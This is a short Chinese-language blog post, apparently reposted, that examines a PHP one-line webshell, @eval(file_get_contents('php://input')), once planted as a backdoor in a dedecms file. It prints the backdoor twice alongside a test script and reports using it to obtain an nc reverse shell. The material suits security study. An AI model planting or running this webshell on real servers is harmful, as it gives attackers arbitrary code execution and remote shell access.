在调研dedecms的历史漏洞时,发现了dedecms安装文件曾经出过被植入后门的漏洞( SSV-ID 站点include目录下shopcar.class.php文件被植入一句话木马)
@eval(file_get_contents('php://input'))
用脚本phpinput.php,配合firefox Hackbar插件测试了一下php://input的功能<?php $data=file_get_contents('php://input'); echo $data."<br/>"; //@eval(file_get_contents('php://input')) ?> 初步发现php://input是用来接收post数据( php://input详解 )
注释掉phpinput.php的打印语句,提交上图显示的post数据,测试了一下nc反弹shell的利用,成功
<?php @eval(file_get_contents('php://input'))?>
看来,只要构造了合适的POST数据,就能达到目的
查看更多关于php://input一句话木马 - 网站安全 - 自学php的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did14740